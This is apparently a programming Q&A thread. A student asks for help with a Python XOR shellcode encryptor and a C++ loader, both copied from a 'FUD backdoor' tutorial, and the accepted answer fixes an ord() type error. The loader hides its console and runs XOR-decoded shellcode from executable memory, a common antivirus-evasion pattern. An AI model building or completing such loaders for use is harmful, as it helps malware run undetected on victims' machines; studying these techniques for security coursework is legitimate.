# The XOR encryption I found using python does not work and I need it to encrypt a file then I need the loader to decrypt and run the file

Tags: python, c++, security, encryption, loader

I am working on a project for my college cybersecurity class on penetration testing. I have found a site (https://macrosec.tech/index.php/2020/09/20/creating-a-fud-backdoor/) that has python code for an xor encryptor as well as c++ code for a loader. The python code is meant to be run in the command line taking an input file and specifying an output file. For example, you would run the code by running python xor_file.py sample.txt > output_file.txt. However, when I run the code it doesn't work. I am very inexperienced with encryption and python so any help would be greatly appreciated. The code is below.
`

```
import sys
KEY = 'x'
def xor(data, key):

    key = str(key)

    l = len(key)

    output_str = ''

    for i in range(len(data)):

        current = data[i]

        current_key = key[i % len(key)]

        output_str += chr(ord(current) ^ ord(current_key))
    return output_str

def printCiphertext(ciphertext):
    print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")
try:
    plaintext = open(sys.argv[1], 'rb').read()
except:
    print('File argument needed! %s ' % sys.argv[0])

    sys.exit()

ciphertext = xor(plaintext, KEY)
print("{ 0x" + ", 0x".join(hex(ord(x))[2:] for x in ciphertext) + "};")
```

The loader code is as follows:

```
#include <windows.h>
#include <iostream>
int main(int argc, char **argv) {

    ShowWindow(GetConsoleWindow(), SW_HIDE);

    char b[] = {/* your XORd, with key of ‘x’, shellcode goes here i.e. 0x4C,0x4F, 0x4C */};

    char c[sizeof b];

    for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ ‘x’;}

    void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    memcpy(exec, c, sizeof c);

    ((void(*)())exec)();

}
```

I have messed around with it a bit but every time I fix an error a new one replaces it.

Comment: " when I run the code it doesn't work." is a useless description of your problem for us to be able to help you. If you get an error, you need to include the complete error traceback in your question. Also, it would be good to hardcode the exact data that you use when getting that error.

Comment: Is the assignment to write an encryption function or are you free to use an existing one?
Debugging and validating an encryption function is difficult.

Answer (score 0, accepted):

When I run the python code you included using Python 3.11, I get the following error:

```
Traceback (most recent call last):
  File "/Users/jacksonmcafee/xor_file.py", line 29, in <module>
    ciphertext = xor(plaintext, KEY)
                 ^^^^^^^^^^^^^^^^^^^
  File "/Users/jacksonmcafee/xor_file.py", line 17, in xor
    output_str += chr(ord(current) ^ ord(current_key))
                      ^^^^^^^^^^^^
TypeError: ord() expected string of length 1, but int found
```

You open the file and read it in as binary data.

In this case, the call to `ord(current)` is redundant, because `current` is already an integer value after `current = data[i]`. See [this link](https://stackoverflow.com/questions/19897209/why-do-i-get-typeerror-ord-expected-string-of-length-1-but-int-found-using) for more information.

If you remove `ord()` around `current`, the code runs.

Comment: This worked great. Now I'm just trying to figure out how to run the c++ loader with a sample file. I'm using a hello world python script that I ran through the encoder. After running through the encoder I entered the xor_output.txt data into the loader but I don't know how to run C++ code as I've never used the language before.

Comment: I just compiled with g++ and the loader appears to not work. I'm not sure if I did something wrong compiling or it's something wrong with the code.